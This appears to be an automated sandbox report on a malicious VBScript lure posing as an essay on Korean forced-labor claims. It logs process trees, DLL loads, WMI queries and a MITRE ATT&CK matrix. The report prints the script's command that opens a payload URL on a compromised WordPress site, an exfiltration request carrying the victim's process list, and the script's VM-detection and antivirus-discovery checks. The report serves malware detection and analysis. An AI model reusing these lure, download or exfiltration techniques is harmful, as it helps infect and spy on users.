Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 5.9.123.217:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49782 version: TLS 1.2

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior

Source: Essay on Resolution of Korean Forced Labor Claims.vbs

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal88.troj.evad.winVBS@23/25@29/14

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Essay on Resolution of Korean Forced Labor Claims.vbs"

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\explorer.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: Essay on Resolution of Korean Forced Labor Claims.vbs	ReversingLabs: Detection: 21%
Source: Essay on Resolution of Korean Forced Labor Claims.vbs	Virustotal: Detection: 23%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Essay on Resolution of Korean Forced Labor Claims.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\explorer.exe explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2036,i,652845326045474574,16795533122018123490,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\explorer.exe explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2036,i,652845326045474574,16795533122018123490,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ninput.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ninput.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sfc_os.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\explorer.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

VBScript performs obfuscated calls to suspicious functions

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: setRequestHeader("Content-Type", "application/x-www-form-urlencoded");IServerXMLHTTPRequest2.send("p=system_idle_process_system_registry_smss.exe_csrss.exe_wininit.exe_csrss.exe_winlogon.exe_services.exe_lsass.exe_svchost.exe_fontdrvhost.exe_fontdrvhost.exe_svchost.exe_svchost.exe_dwm.exe_svchost.exe_svchost.exe_svch");ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbemObjectEx._01800001();ISWbem

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Battery

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: explorer.exe, 00000004.00000003.2300646799.0000000000B85000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1758376730.0000022AC5CA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756399890.0000022AC5C8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1742879491.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756768299.0000022AC5C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1742392823.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1759680195.0000022AC5CA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1759807591.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1743103250.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1756206708.0000022AC5D10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000003.2300646799.0000000000B85000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe

Network Connect: 5.9.123.217 443

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\explorer.exe explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Leaks process information

Source: wscript.exe, 00000000.00000003.1694034280.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694182734.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693990509.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694080356.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694130038.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694292855.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1758537081.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694238433.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693830385.0000022AC5A3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693930201.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694408383.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bdagent.exe
Source: wscript.exe, 00000000.00000003.1694034280.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694182734.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693990509.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694080356.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694130038.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694292855.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1758537081.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694238433.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693830385.0000022AC5A3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693930201.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694408383.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ayagent.aye
Source: wscript.exe, 00000000.00000003.1694034280.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694182734.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693990509.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694080356.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694130038.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694292855.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1758537081.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694238433.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693830385.0000022AC5A3F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693930201.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694408383.0000022AC5A4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgui.exe

Stealing of Sensitive Information

Source: global traffic

TCP traffic: 192.168.2.4:49738 -> 5.9.123.217:443

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	11 Windows Management Instrumentation	221 Scripting	111 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	111 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	111 Process Injection	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	4 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

